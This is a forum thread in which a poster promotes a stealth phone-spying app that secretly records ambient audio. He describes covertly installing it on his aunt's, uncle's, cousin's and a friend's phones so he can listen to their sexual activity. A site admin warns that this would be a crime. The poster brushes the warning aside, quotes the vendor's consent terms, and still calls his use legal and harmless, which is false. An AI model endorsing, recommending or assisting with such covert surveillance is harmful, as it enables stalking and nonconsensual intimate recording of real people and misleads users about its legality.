New Way to Spy on Sex Sounds

For "how to do this" questions and answers, notes, instructions
moanspy

New Way to Spy on Sex Sounds

Post by moanspy »

Hi All

I have found a new way to SPY and thanks to Smartphones , Who doesn't have it ? and who don't keep it next to him/her almost all day and even on the bed side table ?

Well yeah its a Simple Spy APP for android or iOS called android 007 , you can read more here : http://www.android007.com

it have a lot of features to control the phone but the Feature that interest me and i think most of you is AMBIENT VOICE RECORDER yeah ! with a simple click from your Computer, tablet or phone you can send secretly an order to the target phone to start Recording whats going on , and after you set for how many minutes the file automatically will be uploaded to your cpanel and you can start listening ....

The down side is that you can only listen to people you know and have access to there phone so you can install the app , in my case this is my list :

- My Aunt / My Uncle / a friend of mine *male but he have a hot girlfriend* / my cousin * female *

also the other down side its not Free , but its worth it :D

The Big positive part is that this spy app work in stealth mode , this way the phone owner will never know that the app is installed on his his/her phone or even its running , they will not notice that you are spying or listening to there hot moments

Hope this was helpful .
yeppie
Site Admin

Re: New Way to Spy on Sex Sounds

Post by yeppie »

I can´t find this app in Google´s Play Store so I recommend not to install it on your or any phone.
And I definitely recommend not to spy people by using this tool - this would be a serious crime!
Sexsounds are Poetry for Adults
moanspy

Re: New Way to Spy on Sex Sounds

Post by moanspy »

yeppie wrote:I can´t find this app in Google´s Play Store so I recommend not to install it on your or any phone.
And I definitely recommend not to spy people by using this tool - this would be a serious crime!

Yes you are right , this app is not found on any store , its a .apk file that means you purchase it away from the stores .

About crime , well this is what they say about there app on there website : Android 007 app is developed to serve the purpose of ethical supervision for parents wishing to supervise the activities of their underage wards or for employers wishing to supervise their employee-base, but having express, on-paper consent. Android007 Application must either be the owner of the cellphone or has on-paper consent from their wards or employees which would grant them authority to supervise their activities before they are able to install, download or enable the Android007 Monitoring software onto the particular cellphone. Android007 service should not be put to use as a means of spying or stalking virtually anyone. Android007 software should not be subjected to monitoring the cellphone of any other person in the end-user’s social circle, including their children over 18 years without their express, on-paper permission.

So it is Legal , but we as Moans lovers we can use it for another purposes :D , for the time am using this app and its real fun and Hot , Since am hurting no body and its for personal use noting bad will happen :D .